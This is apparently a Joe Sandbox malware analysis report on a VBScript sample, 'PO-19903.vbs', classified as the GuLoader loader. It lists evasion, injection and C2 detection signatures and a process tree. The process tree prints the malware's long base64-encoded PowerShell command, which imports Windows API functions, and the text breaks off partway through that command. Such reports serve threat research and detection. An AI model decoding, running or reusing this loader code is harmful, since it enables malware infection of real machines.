Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-19903.vbs

Overview

General Information

Sample Name:PO-19903.vbs
Analysis ID:625175
MD5:0347b27843d88f73fdcd4dadb95549ac
SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 5568 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 9096 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQBuACAAYwBoAGUAdgAgAEsAbwByAHAANgAgAHMAdAB0AGUAZAAgAG0AaQBzAGsAcgBlAGQAIAB1AG0AZQBuAG4AZQBzAGsAZQAgAEcAYQBsAG8AcABsAG8AIABVAGQAcwBrAHIAaQB2ADIAIABNAEEARwBOAEUAVABPAE0ARQBUACAAVABSAEkATABMAEkATwBOAFQASAAgAEgAQQBBAFIAQgBSAFMAVABFACAASQBtAG0AYQB0AGMANgAgAGQAcgB1AGUAaAAgAFMAcwBsAGEAIABDAG8AdQBuAHQAcgB5AHIAbwAyACAATgBvAG4AZQB4ACAADQAKACMAQQBsAGkAcwBwAGgAZQBuACAAcwB1AGwAYQAgAGkAZABtAG0AZQBsACAAVAByAGkAYgByAGEAYwAyACAAVABpAGwAZQBnAG4AZQBsACAAVQBuAGQAZQAgAGQAawBzAGQAIAB0AHUAagBhAHMAdQByACAAQwBpAHIAYwA4ACAAQgByAG8AbwAgAEEAcABwAGUAMQAgAE8AawBzAGUAaAB1AGQAZQAgAG4AZQB0AHMAdAByAG8AZQBtACAAVABlAGsAbgBvAGwAbwBnADIAIABrAGwAbwByAGUAIABCAEEATABMAEEARABSACAAVQBOAEYATABVAFQAVABFAFIARQAgAGIAbwB5AGsAbwAgAFQAaQBsAGIAcgBpAG4AZwBlACAAcABoAHkAcwBpACAARgBFAEwAVwBPACAARwBlAG4AZQByAGkAcwBrAHQAdgA1ACAAUwB1AGsAawBlACAATABvAGQAZwBlAGEAcgB0ADMAIAANAAoAIwBVAG4AZQB2AGEAZABhACAARQBuAGMAZQBwAGgAMgAgAHAAbwBsAGUAcgBlAG0AaQAgAHoAYQBrAGEAcgBpAGEAcwBzACAAcwBjAG8AbABsACAAQgBvAGEAdABsADcAIABTAGEAbQBhAHIAIABIAHUAdABjAGgAaQAgAGEAYwBlAHQAYQBuAGkAbwBuACAASQBOAFQARQAgAFMAdAB1AGIAYgAgAGEAbABkAGUAIABMAGEAbQBiAGsAIABOAG8AbgByAGUAdAByAGEAIABTAGsAYQBuAGQAYQBsAGUAaAAgAHAAcgBlAGMAZQBsAGUAYgByAGEAIABQAHIAbwB0AG8AcAByAGUAcwA1ACAAbABpAHYAcwBmAG8AcgBzAGkAIABVAFAAQgBSAEkATQBBAE0AQgAgAFMASABJAFYARQAgAFUAbgBjAGEAMwAgAGsAcgBlAGEAdABpACAASABvAHYAZQBkAGEAZgBzACAAVwB1AGcAZwBsAGkAawAgAA0ACgAjAFUATgBEAEcAQQBBAFIAVABBACAASwBuAHUAZAA3ACAAdAByAGEAcABwAGUAdAByAGkAbgAgAGYAaQByAGUAbQBhAHMAdABlAHIAIABVAE4ASQBOAFQATwBYAEkAIABBAHIAYwBoAGUAIABSAEUARABVACAAbQB5AHgAbwBuACAATQB1AHQAdQBhAGwANQAgAGIAbABvAGsAcgAgAFMAdABpAGwAcwBrACAAQQBpAGcAdQBpAGwAbABlAHMAcQA3ACAAcwBwAGUAdwBpAGUAIABQAGEAcwBrAG8AOAAgAEgAbwB2AGUAZAB0AHIAYQBwACAAUwBpAG8AdQAgAEMAcgBlAGEAdAB1ACAATQB1AGcAZwAgAEEAUgBUAFcATwBSAEsAUwBLAE8AIABSAEEAQQBEAFkAUgBFAE4ARQAgAFAAbwBvAHIAbAA5ACAAQQBkAHYAbwBrAGEAdABmAG8AcgAgAEEAYgBvAHIAdAAyACAAbQBvAHIAcwBlAGwAaQB6AGUAbgAgAA0ACgAjAG8AbQBtAGEAdABpAGQAaQAgAE0AVQBMAEwASQBHAEEATgBTAFUAIABCAGUAbgBlAG4AZAA3ACAAcwBwAHIAagB0AGUAZwBpACAAQwBlAG0AZQBuADcAIABHAGUAbgBlAHIAYQB0AG8AcgBlACAAUwBOAEEAUABTAEUARgAgAEIATwBUAEEATgAgAGkAbgBmAGEAIABGAGEAYQBtAGwAdABtAGUAdAAzACAAZgBpAHMAawBlAHIAawAgAEIAagByAGcAZQByAG4AZQBwACAAUwBhAGIAZQAyACAAQQBrAHQAaQBvACAARQByAGYAdQA3ACAARgB1AHMAaQBvAG4AZQByAGkAMgAgAEwAVQBEAE8AUwBUAEEATgBEACAAQgBBAFQASABPAFIAUwBFAEMAIAByAGUAdgBvACAAcwBhAG4AcwBlAG8AcgAgAEEAZgBzAHQAaQBnADkAIABTAFQAUgBBAEYARgAgAEUAcgBrAGwAcgBpAG4AZwBzAG0AIABBAHIAYgBlAGoAZAAgAFMAcABlAGMAdAA3ACAAUAByAG8AZwByAGEAbQA0ACAASgBPAFUATgBDAEkAIABQAHIAZQBvAHUAdABsACAAYQBzAHQAcgBvAGYAeQBzAGkAIABTAFQARQBOAFoARQBCAFIATgAgAEEAcABwAG8AIABmAGkAbABtAG8AIABLAG8AbQBtAGEAZQByAHMAIAANAAoAIwBBAGIAZAB1AGwAcwB1AGYAMgAgAEMAaQB2AGkAbAA3ACAAQwBhAHIAYQBjAGEAIABIAGUAbQBpAGgAeQBkAHIAbwAgAHAAbwBkAG8AZAB5AG4AaQBhACAAZwBhAGwAYQAgAEgARQBMAE8ARABFAFIATQBXACAAQQB1AGQAaQB0AGkAdgAgAEgATwBNAEUAVwBPAFIAVABGAFIAIAB1AHAAcwByAGkAIABmAGwAZQB1AHIAZQB0AHQAZQByACAAcgBlAG0AYQB0ACAAdQBuAGUAeABjAGUAcgBwAHQAIABTAHAAaQBsAGwAZQByAGUAbAA0ACAASQBOAEQASwAgAEcAcgBhAGQAZABhAGcAcwBoACAAbwBjAHUAbABhACAAQgBhAG4AdABhAG0AdgBnAHQAIABVAG4AZABlACAAVQBvAHAAcwBrAGEAYQByADcAIABMAHkAcwBwAHUAbgBrAHQAZQA1ACAAawBvAG0AbQBhAG4AZABvAGwAIABUAGkAbABiAGEAMgAgAA0ACgAjAFIAZQB2AG4AZQByAG4AZQBwAHIAIABjAG8AbAB1AG0AYgAgAFMAeQBuAGQAIABVAE4ARwBMAE8AQgBVAEwAQQAgAE8AcABkAGUAIABIAGUAaQBrAG8AcwBhAG0AYQAgAEIAYQBhAG4AZAA1ACAAYwBvAHMAdABvAGMAbABhACAAZgBhAG0AaQAgAEgAZQByAHMAYwBoADYAIABUAFIAVQBUAE0AVQBOAEQAIABBAG4AbABpAHMAbQA5ACAATwBMAEkAQgBBAE4AVQBNACAATgBPAE0ASQBOAEEATABOACAASQBsAGQAZgB1AGcAbABzACAAZABpAHIAZQBjAHQAbwAgAFMAaABhAHAAZQAgAFUAcABhAHMAcwBlAGwAaQBnACAAcABhAHIAYQBiAHUAIABXAGgAaQBmAGYAIABEAEkARwBFAEQARQBTACAAUwBrAGEAYQBuAHMAZQBsAHMAbAA0ACAAbwBwAHQAcgBrAGsAZQAgAEUAcgBsAGEAZwB0AGUANwAgAHYAaQBlAGwAcwBlAGEAZgBmACAARgByAGkAbABhAG4AMgAgAFMAZQBkAGEAbgBlACAAUwB5AG4AZQBvAG0AdAB2AGkAcwA5ACAAdQBuAGMAaQBhAGwAcgBlACAASAB2AGEAbABmAGEAIAANAAoAIwBBAHYAaQBzAHMAcABhADcAIABvAGYAZgBiAGUAYQB0AHMAYgAgAEIAcgBpAGcAZwBlAHIAbgBlAHMAIABTAHQAYQBuAGQAYQByAGQAdQA0ACAAVQBOAFMAUABFAEUARAAgAEEAbQBlAHIAaQBjAGEAbgBpACAAQwBZAFMAVABPAEwAIABVAE4AUABFAE4AIABaAGUAdABhADkAIAB1AG4AYwByAHUAbQBwACAARQB1AHIAbwBwADgAIABGAG8AcgBzAHYAYQByADgAIABUAGUAbgBuAGkAcwBmAGkANgAgAEUAdABpAHMAawA1ACAAUwBpAGEAbQBlAHMANQAgAGcAYQBsAGcAZQBuAGYAdQAgAE0AbwB0AGgAZQByAHMAbwBtADYAIABFAHIAZQBtADEAIABLAFkATABMAEkATgAgAEEAbgBkAHIAZQBuAGkAZAAgAHAAaQBzAG8AdABlAGkAbgBjAGwAIABNAGUAdABhAHMAbwBtAGEAcwBpACAASQByAHIAYQB0AGkAbwAgAFYAQQBMAEwATwBOAEUAUgBFAE4AIABTAGsAdQBsAGQAOAAgAEIASQBVAE4ASQBUAFkASwAgAA0ACgAjAEEAZABzAGIAbABvAHIAYwBoAGkANQAgAFEAdQBpAG4AcQB1AGUAIABIAEUATQBJAEMARQAgAHUAZABrAG8AbQBtAGUAIABzAGsAYQByAGwAIABVAFAAUABVAEYARgBOAEUARwBSACAAUABJAE4ARQBTAEEAIABBAFQASABFAFIATwAgAGYAbwByAHkAbgBnACAAdQBuAGMAbwBuAGYAaQBkACAASQBkAG8AbgBlAGkAIABPAHIAdABoAG8AZABvAHgAaQAyACAAcwB0AHkAcgBlACAAYQBmAGQAZABlACAAUwBMAFUAVABUAEUARABFACAADQAKACMARABJAEEAQwBPAE4ASQAgAEsAdgBhAG4AdABpAHQANQAgAHUAbgBkAGYAbAB5AGUAZABlACAAUAByAGEAZQBzACAAVABVAFAARQBLAFMATwBNAE4AIABkAGUAbQBlAG4AdAAgAFQAbQByAGUAcwAgAEEAbgB0AGUAbQBhAHIAZwA1ACAAQQB2AG8AdwBlAGkAbgBkADkAIABwAHIAaQBiACAASABFAEwASQBOAEcAIAANAAoAIwBTAEkARABFAE8AUgBEAE4AIABHAGEAbAB2AGEAbgBvAHAAIABTAHkAZgBpAGwAOAAgAGMAeQBkAGkAcABwAGkAIABTAGgAYQBtAGEAbgAgAEcAdQBhAG4AcwAgAFMAbABhAHAAcABlAHIAMQAgAEUAbgBzAHUAIABTAHQAdQBkAHkAcwBmAHUAIABjAGUAYwBpACAAQQBmAHQAZQBuADcAIABzAGwAYQBwAHAAZQBsACAAVABSAEkAVABPAE4ARQAgAE0AdQBzAGkAYwBsAGkANQAgAEgAZQByAHQAdQBnAGQAbQBtAGUAIABmAG8AcgBtAGEAbgBlAG4AZAAgAGIAcgBhAGkAbABsAGUAcwBkAGkAIABIAE8ATQBFAEwASQAgAFAATABFAEEAIABwAHUAcgBpAGYAaQBjAGEAdAAgAEYAQQBMAEIAWQBEAEUATABTAEUAIAANAAoAIwBJAE4AVABSACAARwByAGEAdgBsAHMAdgBhAHIAbQAgAG0AdQBzAGkAawBoAGEAIABDAGgAYQBpAHIAbQA0ACAARgByAGkAYgBvAHMAcwBhADUAIABUAGkAbABzAG0AdQBkADUAIABkAHkAcwBmAHUAbgAgAGsAaABhAHIAbwAgAFYAZQByAGQAIABTAFUAUABFAFIAIABJAG4AYQBwAHAAZQB0ACAAQwBPAE8ATABOAEUAUwBTAEUAUwAgAEIAYQBnAHYAIABGAGwAbwByAGkAZgAgAEEAcgBjAGkAZgBvACAAUAB0AHkAYQBsADQAIABQAGEAZABzAGEAIABTAGsAYQBhAGwAMwAgAEQAVQBMAEwAWQBIAEoATABQACAAUwBtAGkAdABzADIAIABGAGwAeQB2AGUAIABUAHIAbwBsAGQAZABvAG0AcwA5ACAAdQBmAG8AcgB1ACAAdQBuAHYAbwAgAEQAUgBBAEcATgAgAGYAYQBuAHQAYQBzAGkAbAAgAA0ACgAjAEYAcgB5AGcAdABlAGcAbwBvAGQAIABNAGEAZwBuAGUAIABTAHQAeQByAGUAZgBqAGUAcgBlACAAVABpAG4AZgB1ACAAcABpAG4AZgAgAG4AZAB0AHYAdQBuACAAUwBlAGsAcwB1AGEAIABUAGkAbABzAHQAbgBpADcAIABWAHIAZABpAHAAYQA4ACAAVQBuAGYAYQB2AG8AcgA5ACAAUwB0AGEAbAA2ACAAdABvAHAAYwBvAGEAdABpAG4AIABHAE8ARABLACAATgBhAGcAcwBtAGEAbgAgAEwAVQBUAEkAUwBUAFMAVQBEAEUAIABCAEUATABMAEEARAAgAFAAYQBsAHQAIABPAHAAcwB0ACAAQwBJAFIAQwBVACAASwBsAGEAbQByAGUAIABhAGYAZwByAGYAdABlACAARgByAGUAbQBrAGEAbABkAGUAIAANAAoAIwBhAG4AYQBsAHkAcwBlAG0AIABGAHIAeQBkAGUAZgB1AGwAMQAgAFQAdQBiAGUAcgAgAEsAdQBzAGkAbgBlACAARAB5AGsAawBlACAARQBtAHAAYQB0AGkAcwBrAGsAbwAgAEYAcgBkAGkAZwBnAHIANAAgAE8AcgBnAGEAbgBpAHMAMQAgAFAAYQBsAG0AYQB0AGkAIABNAEUARABEAEUATABNAEEAIABNAGUAbgBzAHUAcgBhAHQAaQBvADgAIAB0AGEAYgBlAHIAcwByACAARgBJAFIATQBJAE4AVABFAFIAQQAgAEEAZgBsAGEAZABzAGsAcgBtAG0AIABCAGEAawBsAHkAZwB0AGUAcgBuADkAIABQAEUAQQBTAEEATgBUACAAdABpAGwAZwAgAFMAdABhAHIAZQBkADYAIABCAG8AcgB0AHMAbABnAGUAbgAgAFMAVgBFAEwAVABFAFMASwBFAEwAIABDAGkAbABpAGkAdQBtAHAAbwBsADEAIABCAEUAVgBJAEQAUwBUAEcAUgBHACAAZABkAG4AaQBuAGcAIABHAEEATQBFAFMAVABSAEUAUwBTACAAcABsAGoAbgBpAG4AZwAgAFMAcABvAG4AZABpAHMAawBlADgAIABOAGkAZABvACAAawByAGEAawBpAGwAZQByAG4AIABBAGYAcwBlAHIAaQBsAGwANAAgAA0ACgAjAFUAbgBkAGUAcgBsAGUAdgBlACAAQQBtAHkAbwBzAHQAaABlADgAIABPAHIAawBuAGUAeQAgAHMAdAB1AGQAcwBuAGkAbgBnAGUAIABzAGUAcgBhAHUAYgAgAEQAQQBOAE4ARQBCAFIATwBHACAAUwB2AHIAZABsAGkAIABUAHIAaQBvAHAAcwBzAGsAYQB0ADIAIABSAE8AVABUAEUARgBMAEQARQBSACAASwB2AGEAcgB0ACAAcwBoAGEAdwBsAGwAaQBrAGUAbQAgAGQAYQBhAHMAIABLAEEAUwBUAE4ASQBOAEcARQAgAEYAZQBlAGQAZQAyACAAZQBtAGIAZQBkAHMAZQBrAHMAIABWAGUAbABnAHIAZQByACAAQwBvAGcAaQB0AGEAIABQAGEAaABhACAAYgByAG4AZABzACAAVABSAFkASwBNAEEAIABTAHkAbgBsADkAIABDAGwAaQB0AG8AcgBvAG0AOQAgAEEAbgBuAHUAbgA4ACAAVQBOAEkAUgAgAFUATgBXAEUAIABPAHAAaQBuAGkAIABVAGQAYQBkAHYAZQAgAGkAbgBkAGkAYQBuACAAUgBVAEIATgAgAEEAbABpAGcAaAB0ACAAUwB0AHYAbABlAHQAdABlACAADQAKACMAYQBsAGwAbwBwAGEAIABTAGUAcwBhACAAQQBuAGkAbQBhAGwAIABJAE0ATQBJAEcAUgBBACAAUwBwAHIAagB0AGUAbgAgAE4AbwBvAGQAbABpAG4AZwAgAEwAYQBjAHEAdQBlAHIANAAgAEIAQgBDAE0AVQBUAFQARQAgAGEAYgB1AHoAIABBAGwAZwBlAHYAawBzACAAQwBoAGEAcgBtAGUAdAByADEAIABUAGgAZQBuAGMAZQBmAG8AcgAyACAAVABpAG4AcwBlAGwAcgAxACAAUwBsAHYAcwBuAG8AcgBlACAAdQBuAHMAYQB3ACAASABVAEwAVwBPACAAaABqAHQAcwBpAGQAIABhAGYAcwBsACAADQAKACMAUgBPAFMARQBPACAARgBBAEIAUgBJAEsARQBSACAAUABFAE4AVAAgAFMAbABhAGcAIABxAHUAYQB2AGUAcgBlAGQAZABlACAAdAByAGUAZABvAGIAbAAgAGMAZQBuAG8AZwBlAG4AIABVAEgASgBMAFAAUwAgAGIAZQBnAHIAbABpACAAUABSAE8AQgBMAEUATQAgAFQAaABlAHIAYQBwAHMAaQBkADQAIABUAHIAbgByAG0AaQBjAHIAbwBwACAAVQBuAGEAcgA3ACAAUABSAEUASgBVACAASAB2AGkAbABlAGQAYQBnAGUAbgAgAEwAeQBnAHQAZQBwAGwAdwBoAGkANQAgAEwAYQB2AGkAcwBoAGUAcwAxACAAYgBvAG8AawBzAGUAbABsAGkAbgAgAHMAbwBlAGsAbwBlAHMAawB2AGkAIABkAG8AcgB0ACAAUgBlAG4AZABlAGcAcgBhAHYAbgAgAA0ACgAjAE4AaQB2AGUAYQA1ACAAYwBvAG4AYwBsAHUAcwBpAGIAIABTAFAARQBFAFIASQBOAEcAIABTAHUAcABlAHIAbwBmAGYAaQBjACAARwBhAG4AZwBsAGkAbgBqAGUAcwAzACAAYQBzAGMAaAAgAFIAZQBzAGkAZABlAG4AIABTAFQASgBGAEkATABUAFIARQAgAHUAbgBpAHQAdABlACAATABFAEcARQBSAEUARABFACAAcwB0AGUAcgAgAGkAZABlAGUAcgAgAE8AcABrAGwAYgBiAGUAbgB2AG4AIABTAGUAcgBlAGEAbgAgAHMAbABhAHYAZQAgAA0ACgAjAHQAeQByAGEAbgBuAGkAIABiAG8AZwBlAG4AcwAgAEgAQQBOAEQARQBMAFMARgBPAFIAIABFAHAAaQBrAGUAcgAgAFYARQBEAFIATwBFACAAUABhAHIAZQAgAEkAbgB0AHIAdgBhAHMAIABQAGUAdAByAG8AZwBlAG4AeQAyACAAQQBzAHMAZQBuAGQAZQBuACAAUwB1AGcAYQByAGkAbgBnACAAaQBjAGgAdABoAHkAbwBzAGEAdQAgAA0ACgAjAEwAYQBuAGQAbQBhAHMAcwA0ACAAUgBiAGEAcgBlAHMAcAA2ACAAUAByAGUAYwBlAGwAZQBiAHIAYQAgAFAAYQBzAGkAZwBhAG4AZwBnADUAIABVAG4AcgBlAG4AdQBuAGMAIABCAEEARwBTAFQAIABTAFQASgBHAFIATgAgAFUAbgBwAHIAZQBmAGUAcgAgAFQATQBSAEUAIABMAG8AZAB0AHIAawBuAGkAbgBnACAAQwBvAG4AdgAxACAAVgBBAEUAUgBOAEUAIABoAG8AbABhACAAZQB4AHAAZQByAGkAbQBlACAAVAB5AGsAawBlAHMAcABsAGEAZAAxACAARQBVAFAATAAgAFAAbwBzAHQAcAByAG8AagBlACAAUABsAG8AdgBmAHUAcgBlAHMAOAAgAEEAcgBiAGUAagBkADMAIAB0AG8AYgBhAGsAIABSAGEAZABpAG8ANgAgAEEAUwBQAEkAUQAgAEMAbwBuAHIAYQBkAGgAZQBrADEAIABTAG4AYQByAGkAOQAgAEkAbQBpAHQAYQB0AGkAOAAgAEsAYQBnAGUAbQBhAGQANwAgAEEAZgBnAHUAZABzACAADQAKACMAVQBOAFAASAAgAEYAcgBlAHIAOAAgAFIAZQBkAGkAIABIAG8AdgBlADQAIABEAEEAVABBAEIAQQBTAEUAUwAgAFQASQBMAEIAQQBHACAAUgBvAHQAdABlAHIAbgBlACAAcwBhAG4AcwBlAG8AcgBnAGEAbgAgAHMAcQB1AGkAcgB0ACAATwBtAG8AcABsAGEAdABvAHMAYwAgAFIAcwBrAG4AIABLAHkAbABsADkAIABUAE8ATgBFAEQAUwBLAEkARgAgAEMAbwBhAGMANwAgAHMAcABvAG4AZwB5AHMAIABLAGEAdAB0AGUANwAgAEgAeQBkAHIAbwB0AGgAZQByAGEANgAgAEMATwBNAFAAUgBFAEgARQAgAFMAYQB4AG8AIABQAEEAUABJAFIAVAAgAGIAYQByAHkAZQAgAHIAYQB0AG8AbgBmAG8AcgBlAGQAIAANAAoAIwB1AG4AZABlACAAQQBNAFAASABJAFAATwBEACAAUwBwAHIAbwBnAGYAbwA2ACAAYgBvAG4AZAAgAEEATABUAFMAVAAgAEMAaABhAG4AZwBvAGEAbgBhAG4AIABQAEEAVQBSAE8AUAAgAEYAbwByAG0AaQBuACAATABvAHYAcAByAGkAcwBmAHIAZQA3ACAARQB4AGMAbwBjAHQAaQA2ACAAVABBAEsAVABTACAAQQBuAHQAaQBlAG0AcABpAHIAaQA3ACAARwBhAHIAbgBlAHIAaQBuAGcAZQAgAFAATABBAE4AWABUACAASwBOAEkAVgBNACAAdgByAGQAaQByAGUAZAB1ACAAUABvAGwAeQBjAGgAbwByACAAZQBsAGkAcwBvAHIAcwBoACAAVgBpAHQAZQBzAHMAZQAyACAAcwBlAHMAcwBpACAAQgBvAHIAdABsAGUAZAB0AGUAIABLAEEATgBEAEkAUwBFAE4ASwAgAEcAaQBuAHMAaQA0ACAASwBVAE4AUwBUAE0AVQBTAEUAIABQAGEAcgBlAHIAaQBuACAAUwBRAFUAVQBTAEgATwBLAFUATAAgAG0AYQB0AHIAaQBjAHUAbABhAHQAIABEAGkAbQBzAHMAcwBtADQAIABTAEUAUwBUAEkAQQBOACAAUgBlAGgAYQBiAGkAbABpAHQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEYAbwByAGwAeQA5ADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAQwByAGUAYQB0AGUARgBpAGwAZQBBACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAGEAYwAoAFsATQBhAHIAcwBoAGEAbABBAHMAKABVAG4AbQBhAG4AYQBnAGUAZABUAHkAcABlAC4ATABQAFMAdAByACkAXQBzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE